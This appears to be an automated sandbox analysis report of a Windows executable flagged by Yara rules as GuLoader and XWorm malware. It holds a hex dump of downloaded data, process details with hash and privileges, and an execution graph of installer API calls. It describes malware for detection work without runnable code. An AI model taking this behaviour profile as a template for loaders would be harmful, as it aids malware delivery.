                                                                    2024-10-15 15:44:49 UTC7944INData Raw: b4 cc 81 6b 2b c5 ca 92 33 f6 f5 19 a9 8f 73 07 dd df 64 22 2a 70 33 20 60 b4 85 65 f2 8d 9f 4f de c7 71 8e 08 27 8a cd 5d a1 55 1c b2 0f 86 3b 66 a1 1c 89 6b 47 f2 ad b0 ad 9a d4 f9 3a 4d c8 14 75 01 67 03 41 cb 70 11 12 9b ba 6f c5 01 48 e3 46 98 fb ee c6 97 32 1f 69 48 ac ca 73 68 14 7b 10 ea f3 99 ad 6a 22 05 01 c7 70 0f ce dd 19 c0 50 c5 5f 3e 9b bd eb be 94 33 f0 8d 57 f2 8e e3 c9 b7 b4 c3 8a 0a 6e 34 e2 81 e8 72 57 c3 bd d1 da f0 70 78 fa b2 9c 3a 46 fb 12 d5 ec 4b 48 42 9f e3 97 85 0a 36 5e ac d1 be c7 90 4a 37 bc 9e d9 98 f0 cc 4f 10 63 5a 4e f7 c1 1c 8d 90 d9 02 dc ad 87 85 fc 8b a9 cb 79 10 1e 0f 97 4d 31 00 19 ec 12 89 4a c3 a4 3c 7b 59 f1 c9 fe 5f 87 ac a6 7a e8 b9 b6 2d d5 c3 2a b2 05 69 ac 25 2c 3d 50 9d 51 1d ff 9c 03 29 9b 17 43 6a 4e 7f
                                                                    Data Ascii: k+3sd"*p3 `eOq']U;fkG:MugApoHF2iHsh{j"pP_>3Wn4rWpx:FKHB6^J7OcZNyM1J<{Y_z-*i%,=PQ)CjN
                                                                    2024-10-15 15:44:49 UTC8000INData Raw: 86 33 f5 f4 9f 53 e3 42 77 fa 68 34 96 87 98 23 6f d1 27 72 0b ea ee ed 2b 28 3b 5a 5c ae 0d a9 78 dd 93 6d 93 00 67 cc 60 6b 5d ef ba 23 99 40 72 36 02 23 a2 2d 5e d0 d4 47 a0 7d 00 0a 58 a9 8c 2a 30 57 32 1c 3b f1 cd 76 21 48 94 92 09 de 8c 4a cb d1 5b a0 8c 96 97 74 5c b2 cd d4 ec eb 21 5f 00 70 f6 91 88 c6 53 e5 9e 50 ac 39 64 e7 dd 5d b7 15 5e fa 3b ce aa 77 85 cf 97 fe 7d 12 b6 2f 93 17 5a 50 43 1c c4 21 c7 e6 52 8d 7a f5 a5 fa 50 a5 c4 8e d4 ea 4f 71 6a 0a b8 58 dc 25 04 39 cd a2 29 cb fc b5 63 a7 09 d0 3e 1e 9d 40 65 85 1f e5 2a 5b dd 18 4a 82 1d 26 87 04 fc 50 cc e4 e2 cd 6e d1 50 29 e8 8b 2b 87 e2 18 ea d0 dd 72 52 66 ec 21 86 4a 0d e0 9a 36 1c 61 c7 fe cc e0 86 e7 b1 46 7a 92 9f 6a cc fa 53 09 a5 b6 1b 44 e4 c3 2b 8b 10 33 18 e6 06 e4 36 63 b3
                                                                    Data Ascii: 3SBwh4#o'r+(;Z\xmg`k]#@r6#-^G}X*0W2;v!HJ[t\!_pSP9d]^;w}/ZPC!RzPOqjX%9)c>@e*[J&PnP)+rRf!J6aFzjSD+36c
                                                                    2024-10-15 15:44:49 UTC8000INData Raw: 74 c4 00 9e f8 5b 29 32 38 c5 98 bb 84 87 94 5f 85 e7 38 d2 9a 5c a7 ce 70 da 12 26 ea ed 42 d6 42 2a d8 17 2e 49 85 b5 1b 17 07 8c 03 92 2f 8c 22 af 4d 92 26 5a fd fd 33 d6 b5 c4 bb c1 bb 7d 1c 77 1c 0d 93 0f 5c cd 15 85 f4 93 c6 b6 95 f2 b4 b4 04 3e 95 f2 f6 fb 93 32 60 00 53 8e c8 7d 41 0d d2 41 5e 99 a3 97 d1 c8 4a fc 74 7b c1 cd 05 5b 28 29 4c 1e 89 57 b2 c7 a0 17 d7 a1 64 35 d5 02 e4 d1 04 44 c0 48 8a aa 0c 95 93 8e bd 0a 27 0c 83 b6 91 6f a7 97 a6 66 56 f7 db 03 04 6b 0f 4e 04 66 f0 a9 cf 32 f9 44 1c ef 02 2e 7a 95 d8 53 21 a4 d1 41 08 d5 88 7b 56 37 64 41 e4 a7 0d 6b e8 76 3e f5 fa eb 10 7b 48 4d a5 68 ac d6 d0 ff 12 05 a1 fd 5d ea 28 30 9a a1 9b 53 43 9a 5c fd 6f 1c 4d 83 98 29 4f fb 94 76 0a f6 e9 ed 90 2c 3d 5a 48 8c cb a1 5e dd 92 6c 7b 04 e7
                                                                    Data Ascii: t[)28_8\p&BB*.I/"M&Z3}w\>2`S}AA^Jt{[()LWd5DH'ofVkNf2D.zS!A{V7dAkv>{HMh](0SC\oM)Ov,=ZH^l{
                                                                    2024-10-15 15:44:49 UTC8000INData Raw: 74 d4 8a cb b5 2e 08 2f 30 fa fa dc 68 d1 9c bf 10 33 8d 07 c3 40 1e 38 30 2d 56 27 ef 94 c1 ae 28 35 2c d0 23 1f e2 37 4d 35 3c 43 b7 4d a2 91 fc e1 eb 38 dc c4 e5 e9 d5 58 9e d3 bb d5 97 4b 4b 90 40 1b 48 f2 08 72 74 59 ed 93 43 2f 35 fb b0 ab 65 cc 0c a6 61 1b b0 f5 8c 65 e5 5c 46 99 f3 eb d6 0e e7 43 a9 06 2a 0a b9 ec 25 d0 90 66 34 6b 93 6e fa 55 6f c7 e9 ad 68 22 8a 9c 88 cc 40 9b b9 19 23 26 38 e3 81 9f 90 db 0a 52 c6 45 69 f3 b8 3d 15 2c 6f 80 0a 91 2c 61 c1 df e7 7c 7a 6a dc 64 e7 1d 7e 18 d9 3d 07 30 82 1e 54 73 4b f1 fd 89 29 13 e8 e7 ed c3 52 69 80 d5 b0 f0 d1 bc 63 a9 8c c8 7e 39 93 3e d1 1a 27 0d 42 a1 87 8c 83 dd cf 93 5f f8 21 aa 69 ea fb 1f 1d 50 3a 85 ec d8 bc e2 94 16 e8 86 5c b7 da 2b e3 a2 13 ac 70 41 8f 99 1d 9c 31 4f f9 14 5a 21 6b
                                                                    Data Ascii: t./0h3@80-V'(5,#7M5<CM8XKK@HrtYC/5eae\FC*%f4knUoh"@#&8REi=,o,a|zjd~=0TsK)Ric~9>'B_!iP:\+pA1OZ!k
                                                                    2024-10-15 15:44:49 UTC2424INData Raw: 76 08 cd d3 0b f1 48 c0 58 3c 95 a0 f7 b0 93 34 ed 08 59 e0 0c fc c4 3c bf cb 23 06 a7 13 48 02 91 b6 56 95 c7 3a 9c de 11 88 a8 dd ce 58 2a d5 6d a5 00 64 2e 31 bc 83 e0 27 4d 51 b0 15 be f0 e6 c6 87 51 92 f8 b1 f8 88 e7 50 9f 5c 62 5c 77 58 1a 8d 92 c5 4e 8b b8 81 c9 ff 80 b4 0b a0 96 58 0d 96 5f b0 11 08 6e 5f 79 4d c8 b8 32 66 4e ec cc 9e 43 9a b0 b3 66 f5 bb b3 2d d4 30 b4 ba 08 6e 8b 38 29 21 ec 81 4c 01 e2 c0 1e 2b a9 10 45 78 ce 76 67 70 24 03 28 c5 e7 72 c4 a5 7c 16 4b 88 36 ea 4b 70 f5 00 20 59 fa 07 19 38 de c0 07 f8 0e 7c 84 98 f3 90 59 ca bc 41 3a 32 a5 63 16 a5 76 40 a4 d2 49 ba 4d fa 27 2f 1e e8 57 62 eb e4 be ce c6 47 2c 24 4d d9 8c c1 b0 34 73 63 55 ae b6 9b 69 86 c8 8d 5d 67 cb 5e fa 33 4b 39 52 7b 5e 72 bf cd f8 89 70 38 62 86 62 4b bf
                                                                    Data Ascii: vHX<4Y<#HV:X*md.1'MQQP\b\wXNX_n_yM2fNCf-0n8)!L+Exvgp$(r|K6Kp Y8|YA:2cv@IM'/WbG,$M4scUi]g^3K9R{^rp8bbK


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:11:44:12
                                                                    Start date:15/10/2024
                                                                    Path:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\sgJV11UlDP.exe"
                                                                    Imagebase:0x400000
                                                                    File size:5'329'718 bytes
                                                                    MD5 hash:F3A3332B13BAA50C41644B86EFDF0FE4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1864439498.000000000503C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:11:44:36
                                                                    Start date:15/10/2024
                                                                    Path:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\sgJV11UlDP.exe"
                                                                    Imagebase:0x400000
                                                                    File size:5'329'718 bytes
                                                                    MD5 hash:F3A3332B13BAA50C41644B86EFDF0FE4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4104301125.0000000033921000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:20.5%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:16.3%
                                                                      Total number of Nodes:1535
                                                                      Total number of Limit Nodes:48
                                                                      execution_graph 4989 401d41 4990 401d54 GetDlgItem 4989->4990 4991 401d47 4989->4991 4993 401d4e 4990->4993 4992 402b0a 17 API calls 4991->4992 4992->4993 4994 401d8f GetClientRect LoadImageA SendMessageA 4993->4994 4996 402b2c 17 API calls 4993->4996 4997 401deb 4994->4997 4999 4029b8 4994->4999 4996->4994 4998 401df3 DeleteObject 4997->4998 4997->4999 4998->4999 5000 70021000 5003 7002101b 5000->5003 5010 700214bb 5003->5010 5005 70021020 5006 70021027 GlobalAlloc 5005->5006 5007 70021024 5005->5007 5006->5007 5008 700214e2 3 API calls 5007->5008 5009 70021019 5008->5009 5012 700214c1 5010->5012 5011 700214c7 5011->5005 5012->5011 5013 700214d3 GlobalFree 5012->5013 5013->5005 5014 401ec3 5015 402b2c 17 API calls 5014->5015 5016 401ec9 5015->5016 5017 402b2c 17 API calls 5016->5017 5018 401ed2 5017->5018 5019 402b2c 17 API calls 5018->5019 5020 401edb 5019->5020 5021 402b2c 17 API calls 5020->5021 5022 401ee4 5021->5022 5023 401423 24 API calls 5022->5023 5024 401eeb 5023->5024 5031 4056cf ShellExecuteExA 5024->5031 5026 401f29 5027 4063fa 5 API calls 5026->5027 5029 402783 5026->5029 5028 401f43 CloseHandle 5027->5028 5028->5029 5031->5026 4002 401746 4003 402b2c 17 API calls 4002->4003 4004 40174d 4003->4004 4008 405bb5 4004->4008 4006 401754 4007 405bb5 2 API calls 4006->4007 4007->4006 4009 405bc0 GetTickCount GetTempFileNameA 4008->4009 4010 405bf1 4009->4010 4011 405bed 4009->4011 4010->4006 4011->4009 4011->4010 5032 4044c6 5033 4044d6 5032->5033 5034 4044fc 5032->5034 5036 40407b 18 API calls 5033->5036 5035 4040e2 8 API calls 5034->5035 5037 404508 5035->5037 5038 4044e3 SetDlgItemTextA 5036->5038 5038->5034 5039 401947 5040 402b2c 17 API calls 5039->5040 5041 40194e lstrlenA 5040->5041 5042 4025e4 5041->5042 4119 403248 SetErrorMode GetVersion 4120 403289 4119->4120 4121 40328f 4119->4121 4122 406385 5 API calls 4120->4122 4209 406317 GetSystemDirectoryA 4121->4209 4122->4121 4124 4032a5 lstrlenA 4124->4121 4125 4032b4 4124->4125 4212 406385 GetModuleHandleA 4125->4212 4128 406385 5 API calls 4129 4032c2 4128->4129 4130 406385 5 API calls 4129->4130 4131 4032ce #17 OleInitialize SHGetFileInfoA 4130->4131 4218 405fed lstrcpynA 4131->4218 4134 40331a GetCommandLineA 4219 405fed lstrcpynA 4134->4219 4136 40332c 4137 4059b0 CharNextA 4136->4137 4138 403355 CharNextA 4137->4138 4147 403365 4138->4147 4139 40342f 4140 403442 GetTempPathA 4139->4140 4220 403217 4140->4220 4142 40345a 4144 4034b4 DeleteFileA 4142->4144 4145 40345e GetWindowsDirectoryA lstrcatA 4142->4145 4143 4059b0 CharNextA 4143->4147 4230 402dc4 GetTickCount GetModuleFileNameA 4144->4230 4148 403217 12 API calls 4145->4148 4147->4139 4147->4143 4150 403431 4147->4150 4149 40347a 4148->4149 4149->4144 4152 40347e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4149->4152 4314 405fed lstrcpynA 4150->4314 4151 4034c8 4153 40355e 4151->4153 4156 40354e 4151->4156 4160 4059b0 CharNextA 4151->4160 4155 403217 12 API calls 4152->4155 4331 403730 4153->4331 4158 4034ac 4155->4158 4258 40380a 4156->4258 4158->4144 4158->4153 4162 4034e3 4160->4162 4171 403529 4162->4171 4172 40358e 4162->4172 4163 403696 4165 403718 ExitProcess 4163->4165 4166 40369e GetCurrentProcess OpenProcessToken 4163->4166 4164 403578 4338 405709 4164->4338 4168 4036e9 4166->4168 4169 4036b9 LookupPrivilegeValueA AdjustTokenPrivileges 4166->4169 4176 406385 5 API calls 4168->4176 4169->4168 4315 405a73 4171->4315 4342 405674 4172->4342 4179 4036f0 4176->4179 4182 403705 ExitWindowsEx 4179->4182 4185 403711 4179->4185 4180 4035a4 lstrcatA 4181 4035af lstrcatA lstrcmpiA 4180->4181 4181->4153 4184 4035cb 4181->4184 4182->4165 4182->4185 4187 4035d0 4184->4187 4188 4035d7 4184->4188 4189 40140b 2 API calls 4185->4189 4186 403543 4330 405fed lstrcpynA 4186->4330 4345 4055da CreateDirectoryA 4187->4345 4350 405657 CreateDirectoryA 4188->4350 4189->4165 4194 4035dc SetCurrentDirectoryA 4195 4035f6 4194->4195 4196 4035eb 4194->4196 4354 405fed lstrcpynA 4195->4354 4353 405fed lstrcpynA 4196->4353 4199 40600f 17 API calls 4200 403635 DeleteFileA 4199->4200 4201 403642 CopyFileA 4200->4201 4206 403604 4200->4206 4201->4206 4202 40368a 4204 405dcc 36 API calls 4202->4204 4204->4153 4205 40600f 17 API calls 4205->4206 4206->4199 4206->4202 4206->4205 4208 403676 CloseHandle 4206->4208 4355 405dcc MoveFileExA 4206->4355 4359 40568c CreateProcessA 4206->4359 4208->4206 4210 406339 wsprintfA LoadLibraryExA 4209->4210 4210->4124 4213 4063a1 4212->4213 4214 4063ab GetProcAddress 4212->4214 4215 406317 3 API calls 4213->4215 4216 4032bb 4214->4216 4217 4063a7 4215->4217 4216->4128 4217->4214 4217->4216 4218->4134 4219->4136 4221 406257 5 API calls 4220->4221 4222 403223 4221->4222 4223 40322d 4222->4223 4362 405985 lstrlenA CharPrevA 4222->4362 4223->4142 4226 405657 2 API calls 4227 40323b 4226->4227 4228 405bb5 2 API calls 4227->4228 4229 403246 4228->4229 4229->4142 4365 405b86 GetFileAttributesA CreateFileA 4230->4365 4232 402e04 4250 402e14 4232->4250 4366 405fed lstrcpynA 4232->4366 4234 402e2a 4367 4059cc lstrlenA 4234->4367 4238 402e3b GetFileSize 4239 402f35 4238->4239 4252 402e52 4238->4252 4372 402d60 4239->4372 4241 402f3e 4243 402f6e GlobalAlloc 4241->4243 4241->4250 4407 403200 SetFilePointer 4241->4407 4383 403200 SetFilePointer 4243->4383 4245 402fa1 4247 402d60 6 API calls 4245->4247 4247->4250 4248 402f57 4251 4031ea ReadFile 4248->4251 4249 402f89 4384 402ffb 4249->4384 4250->4151 4254 402f62 4251->4254 4252->4239 4252->4245 4252->4250 4255 402d60 6 API calls 4252->4255 4404 4031ea 4252->4404 4254->4243 4254->4250 4255->4252 4256 402f95 4256->4250 4256->4256 4257 402fd2 SetFilePointer 4256->4257 4257->4250 4259 406385 5 API calls 4258->4259 4260 40381e 4259->4260 4261 403824 4260->4261 4262 403836 4260->4262 4443 405f4b wsprintfA 4261->4443 4263 405ed4 3 API calls 4262->4263 4264 403861 4263->4264 4266 40387f lstrcatA 4264->4266 4268 405ed4 3 API calls 4264->4268 4267 403834 4266->4267 4428 403acf 4267->4428 4268->4266 4271 405a73 18 API calls 4272 4038b1 4271->4272 4273 40393a 4272->4273 4275 405ed4 3 API calls 4272->4275 4274 405a73 18 API calls 4273->4274 4276 403940 4274->4276 4277 4038dd 4275->4277 4278 403950 LoadImageA 4276->4278 4279 40600f 17 API calls 4276->4279 4277->4273 4282 4038f9 lstrlenA 4277->4282 4286 4059b0 CharNextA 4277->4286 4280 4039f6 4278->4280 4281 403977 RegisterClassA 4278->4281 4279->4278 4284 40140b 2 API calls 4280->4284 4283 4039ad SystemParametersInfoA CreateWindowExA 4281->4283 4313 403a00 4281->4313 4287 403907 lstrcmpiA 4282->4287 4288 40392d 4282->4288 4283->4280 4285 4039fc 4284->4285 4292 403acf 18 API calls 4285->4292 4285->4313 4290 4038f7 4286->4290 4287->4288 4291 403917 GetFileAttributesA 4287->4291 4289 405985 3 API calls 4288->4289 4293 403933 4289->4293 4290->4282 4294 403923 4291->4294 4296 403a0d 4292->4296 4444 405fed lstrcpynA 4293->4444 4294->4288 4295 4059cc 2 API calls 4294->4295 4295->4288 4298 403a19 ShowWindow 4296->4298 4299 403a9c 4296->4299 4301 406317 3 API calls 4298->4301 4436 4051e6 OleInitialize 4299->4436 4303 403a31 4301->4303 4302 403aa2 4304 403aa6 4302->4304 4305 403abe 4302->4305 4306 403a3f GetClassInfoA 4303->4306 4308 406317 3 API calls 4303->4308 4311 40140b 2 API calls 4304->4311 4304->4313 4307 40140b 2 API calls 4305->4307 4309 403a53 GetClassInfoA RegisterClassA 4306->4309 4310 403a69 DialogBoxParamA 4306->4310 4307->4313 4308->4306 4309->4310 4312 40140b 2 API calls 4310->4312 4311->4313 4312->4313 4313->4153 4314->4140 4446 405fed lstrcpynA 4315->4446 4317 405a84 4447 405a1e CharNextA CharNextA 4317->4447 4320 403534 4320->4153 4329 405fed lstrcpynA 4320->4329 4321 406257 5 API calls 4327 405a9a 4321->4327 4322 405ac5 lstrlenA 4323 405ad0 4322->4323 4322->4327 4325 405985 3 API calls 4323->4325 4326 405ad5 GetFileAttributesA 4325->4326 4326->4320 4327->4320 4327->4322 4328 4059cc 2 API calls 4327->4328 4453 4062f0 FindFirstFileA 4327->4453 4328->4322 4329->4186 4330->4156 4332 403748 4331->4332 4333 40373a CloseHandle 4331->4333 4456 403775 4332->4456 4333->4332 4339 40571e 4338->4339 4340 403586 ExitProcess 4339->4340 4341 405732 MessageBoxIndirectA 4339->4341 4341->4340 4343 406385 5 API calls 4342->4343 4344 403593 lstrcatA 4343->4344 4344->4180 4344->4181 4346 4035d5 4345->4346 4347 40562b GetLastError 4345->4347 4346->4194 4347->4346 4348 40563a SetFileSecurityA 4347->4348 4348->4346 4349 405650 GetLastError 4348->4349 4349->4346 4351 405667 4350->4351 4352 40566b GetLastError 4350->4352 4351->4194 4352->4351 4353->4195 4354->4206 4356 405de0 4355->4356 4357 405ded 4355->4357 4510 405c5c 4356->4510 4357->4206 4360 4056cb 4359->4360 4361 4056bf CloseHandle 4359->4361 4360->4206 4361->4360 4363 403235 4362->4363 4364 40599f lstrcatA 4362->4364 4363->4226 4364->4363 4365->4232 4366->4234 4368 4059d9 4367->4368 4369 402e30 4368->4369 4370 4059de CharPrevA 4368->4370 4371 405fed lstrcpynA 4369->4371 4370->4368 4370->4369 4371->4238 4373 402d81 4372->4373 4374 402d69 4372->4374 4377 402d91 GetTickCount 4373->4377 4378 402d89 4373->4378 4375 402d72 DestroyWindow 4374->4375 4376 402d79 4374->4376 4375->4376 4376->4241 4380 402dc2 4377->4380 4381 402d9f CreateDialogParamA ShowWindow 4377->4381 4408 4063c1 4378->4408 4380->4241 4381->4380 4383->4249 4385 403011 4384->4385 4386 40303f 4385->4386 4425 403200 SetFilePointer 4385->4425 4388 4031ea ReadFile 4386->4388 4389 40304a 4388->4389 4390 403183 4389->4390 4391 40305c GetTickCount 4389->4391 4392 40316d 4389->4392 4393 4031c5 4390->4393 4396 403187 4390->4396 4391->4392 4400 403088 4391->4400 4392->4256 4395 4031ea ReadFile 4393->4395 4394 4031ea ReadFile 4394->4400 4395->4392 4396->4392 4397 4031ea ReadFile 4396->4397 4398 405c2d WriteFile 4396->4398 4397->4396 4398->4396 4399 4030de GetTickCount 4399->4400 4400->4392 4400->4394 4400->4399 4401 403103 MulDiv wsprintfA 4400->4401 4423 405c2d WriteFile 4400->4423 4412 405114 4401->4412 4426 405bfe ReadFile 4404->4426 4407->4248 4409 4063de PeekMessageA 4408->4409 4410 4063d4 DispatchMessageA 4409->4410 4411 402d8f 4409->4411 4410->4409 4411->4241 4413 40512f 4412->4413 4421 4051d2 4412->4421 4414 40514c lstrlenA 4413->4414 4415 40600f 17 API calls 4413->4415 4416 405175 4414->4416 4417 40515a lstrlenA 4414->4417 4415->4414 4419 405188 4416->4419 4420 40517b SetWindowTextA 4416->4420 4418 40516c lstrcatA 4417->4418 4417->4421 4418->4416 4419->4421 4422 40518e SendMessageA SendMessageA SendMessageA 4419->4422 4420->4419 4421->4400 4422->4421 4424 405c4b 4423->4424 4424->4400 4425->4386 4427 4031fd 4426->4427 4427->4252 4429 403ae3 4428->4429 4445 405f4b wsprintfA 4429->4445 4431 403b54 4432 403b88 18 API calls 4431->4432 4434 403b59 4432->4434 4433 40388f 4433->4271 4434->4433 4435 40600f 17 API calls 4434->4435 4435->4434 4437 4040c7 SendMessageA 4436->4437 4439 405209 4437->4439 4438 4040c7 SendMessageA 4440 405242 OleUninitialize 4438->4440 4441 401389 2 API calls 4439->4441 4442 405230 4439->4442 4440->4302 4441->4439 4442->4438 4443->4267 4444->4273 4445->4431 4446->4317 4448 405a39 4447->4448 4450 405a49 4447->4450 4449 405a44 CharNextA 4448->4449 4448->4450 4452 405a69 4449->4452 4451 4059b0 CharNextA 4450->4451 4450->4452 4451->4450 4452->4320 4452->4321 4454 406311 4453->4454 4455 406306 FindClose 4453->4455 4454->4327 4455->4454 4457 403783 4456->4457 4458 40374d 4457->4458 4459 403788 FreeLibrary GlobalFree 4457->4459 4460 4057b5 4458->4460 4459->4458 4459->4459 4461 405a73 18 API calls 4460->4461 4462 4057d5 4461->4462 4463 4057f4 4462->4463 4464 4057dd DeleteFileA 4462->4464 4465 405922 4463->4465 4497 405fed lstrcpynA 4463->4497 4468 403567 OleUninitialize 4464->4468 4465->4468 4471 4062f0 2 API calls 4465->4471 4467 40581a 4469 405820 lstrcatA 4467->4469 4470 40582d 4467->4470 4468->4163 4468->4164 4472 405833 4469->4472 4473 4059cc 2 API calls 4470->4473 4474 405946 4471->4474 4475 405841 lstrcatA 4472->4475 4476 40584c lstrlenA FindFirstFileA 4472->4476 4473->4472 4474->4468 4477 405985 3 API calls 4474->4477 4475->4476 4476->4465 4495 405870 4476->4495 4479 405950 4477->4479 4478 4059b0 CharNextA 4478->4495 4480 40576d 5 API calls 4479->4480 4481 40595c 4480->4481 4482 405960 4481->4482 4483 405976 4481->4483 4482->4468 4488 405114 24 API calls 4482->4488 4484 405114 24 API calls 4483->4484 4484->4468 4485 405901 FindNextFileA 4487 405919 FindClose 4485->4487 4485->4495 4487->4465 4489 40596d 4488->4489 4490 405dcc 36 API calls 4489->4490 4490->4468 4492 4057b5 60 API calls 4492->4495 4493 405114 24 API calls 4493->4485 4494 405114 24 API calls 4494->4495 4495->4478 4495->4485 4495->4492 4495->4493 4495->4494 4496 405dcc 36 API calls 4495->4496 4498 405fed lstrcpynA 4495->4498 4499 40576d 4495->4499 4496->4495 4497->4467 4498->4495 4507 405b61 GetFileAttributesA 4499->4507 4502 40579a 4502->4495 4503 405790 DeleteFileA 4505 405796 4503->4505 4504 405788 RemoveDirectoryA 4504->4505 4505->4502 4506 4057a6 SetFileAttributesA 4505->4506 4506->4502 4508 405779 4507->4508 4509 405b73 SetFileAttributesA 4507->4509 4508->4502 4508->4503 4508->4504 4509->4508 4511 405c82 4510->4511 4512 405ca8 GetShortPathNameA 4510->4512 4537 405b86 GetFileAttributesA CreateFileA 4511->4537 4514 405dc7 4512->4514 4515 405cbd 4512->4515 4514->4357 4515->4514 4517 405cc5 wsprintfA 4515->4517 4516 405c8c CloseHandle GetShortPathNameA 4516->4514 4518 405ca0 4516->4518 4519 40600f 17 API calls 4517->4519 4518->4512 4518->4514 4520 405ced 4519->4520 4538 405b86 GetFileAttributesA CreateFileA 4520->4538 4522 405cfa 4522->4514 4523 405d09 GetFileSize GlobalAlloc 4522->4523 4524 405dc0 CloseHandle 4523->4524 4525 405d2b 4523->4525 4524->4514 4526 405bfe ReadFile 4525->4526 4527 405d33 4526->4527 4527->4524 4539 405aeb lstrlenA 4527->4539 4530 405d4a lstrcpyA 4533 405d6c 4530->4533 4531 405d5e 4532 405aeb 4 API calls 4531->4532 4532->4533 4534 405da3 SetFilePointer 4533->4534 4535 405c2d WriteFile 4534->4535 4536 405db9 GlobalFree 4535->4536 4536->4524 4537->4516 4538->4522 4540 405b2c lstrlenA 4539->4540 4541 405b34 4540->4541 4542 405b05 lstrcmpiA 4540->4542 4541->4530 4541->4531 4542->4541 4543 405b23 CharNextA 4542->4543 4543->4540 4544 401f48 4545 402b2c 17 API calls 4544->4545 4546 401f4e 4545->4546 4547 405114 24 API calls 4546->4547 4548 401f58 4547->4548 4549 40568c 2 API calls 4548->4549 4550 401f5e 4549->4550 4553 402783 4550->4553 4556 401f7f CloseHandle 4550->4556 4557 4063fa WaitForSingleObject 4550->4557 4554 401f73 4554->4556 4562 405f4b wsprintfA 4554->4562 4556->4553 4558 406414 4557->4558 4559 406426 GetExitCodeProcess 4558->4559 4560 4063c1 2 API calls 4558->4560 4559->4554 4561 40641b WaitForSingleObject 4560->4561 4561->4558 4562->4556 5043 401fc8 5044 402b2c 17 API calls 5043->5044 5045 401fcf 5044->5045 5046 406385 5 API calls 5045->5046 5047 401fde 5046->5047 5048 401ff6 GlobalAlloc 5047->5048 5053 40205e 5047->5053 5049 40200a 5048->5049 5048->5053 5050 406385 5 API calls 5049->5050 5051 402011 5050->5051 5052 406385 5 API calls 5051->5052 5054 40201b 5052->5054 5054->5053 5058 405f4b wsprintfA 5054->5058 5056 402052 5059 405f4b wsprintfA 5056->5059 5058->5056 5059->5053 5060 4025c8 5061 402b2c 17 API calls 5060->5061 5062 4025cf 5061->5062 5065 405b86 GetFileAttributesA CreateFileA 5062->5065 5064 4025db 5065->5064 5066 4037c8 5067 4037d3 5066->5067 5068 4037da GlobalAlloc 5067->5068 5069 4037d7 5067->5069 5068->5069 4808 40254c 4809 402b6c 17 API calls 4808->4809 4810 402556 4809->4810 4811 402b0a 17 API calls 4810->4811 4812 40255f 4811->4812 4813 40256d 4812->4813 4818 402783 4812->4818 4814 402586 RegEnumValueA 4813->4814 4815 40257a RegEnumKeyA 4813->4815 4816 4025a2 RegCloseKey 4814->4816 4817 40259b 4814->4817 4815->4816 4816->4818 4817->4816 4855 405252 4856 405274 GetDlgItem GetDlgItem GetDlgItem 4855->4856 4857 4053fd 4855->4857 4901 4040b0 SendMessageA 4856->4901 4859 405405 GetDlgItem CreateThread CloseHandle 4857->4859 4860 40542d 4857->4860 4859->4860 4904 4051e6 5 API calls 4859->4904 4861 40545b 4860->4861 4862 405443 ShowWindow ShowWindow 4860->4862 4863 40547c 4860->4863 4864 405463 4861->4864 4865 4054b6 4861->4865 4903 4040b0 SendMessageA 4862->4903 4870 4040e2 8 API calls 4863->4870 4868 40546b 4864->4868 4869 40548f ShowWindow 4864->4869 4865->4863 4872 4054c3 SendMessageA 4865->4872 4866 4052e4 4871 4052eb GetClientRect GetSystemMetrics SendMessageA SendMessageA 4866->4871 4873 404054 SendMessageA 4868->4873 4875 4054a1 4869->4875 4876 4054af 4869->4876 4874 405488 4870->4874 4877 405359 4871->4877 4878 40533d SendMessageA SendMessageA 4871->4878 4872->4874 4879 4054dc CreatePopupMenu 4872->4879 4873->4863 4882 405114 24 API calls 4875->4882 4883 404054 SendMessageA 4876->4883 4880 40536c 4877->4880 4881 40535e SendMessageA 4877->4881 4878->4877 4884 40600f 17 API calls 4879->4884 4885 40407b 18 API calls 4880->4885 4881->4880 4882->4876 4883->4865 4886 4054ec AppendMenuA 4884->4886 4887 40537c 4885->4887 4888 40550a GetWindowRect 4886->4888 4889 40551d TrackPopupMenu 4886->4889 4890 405385 ShowWindow 4887->4890 4891 4053b9 GetDlgItem SendMessageA 4887->4891 4888->4889 4889->4874 4892 405539 4889->4892 4893 4053a8 4890->4893 4894 40539b ShowWindow 4890->4894 4891->4874 4895 4053e0 SendMessageA SendMessageA 4891->4895 4896 405558 SendMessageA 4892->4896 4902 4040b0 SendMessageA 4893->4902 4894->4893 4895->4874 4896->4896 4897 405575 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4896->4897 4899 405597 SendMessageA 4897->4899 4899->4899 4900 4055b9 GlobalUnlock SetClipboardData CloseClipboard 4899->4900 4900->4874 4901->4866 4902->4891 4903->4861 4911 4014d6 4912 402b0a 17 API calls 4911->4912 4913 4014dc Sleep 4912->4913 4915 4029b8 4913->4915 4916 401759 4917 402b2c 17 API calls 4916->4917 4918 401760 4917->4918 4919 401786 4918->4919 4920 40177e 4918->4920 4956 405fed lstrcpynA 4919->4956 4955 405fed lstrcpynA 4920->4955 4923 401784 4927 406257 5 API calls 4923->4927 4924 401791 4925 405985 3 API calls 4924->4925 4926 401797 lstrcatA 4925->4926 4926->4923 4929 4017a3 4927->4929 4928 4062f0 2 API calls 4928->4929 4929->4928 4930 405b61 2 API calls 4929->4930 4932 4017ba CompareFileTime 4929->4932 4933 40187e 4929->4933 4936 405fed lstrcpynA 4929->4936 4941 40600f 17 API calls 4929->4941 4951 405709 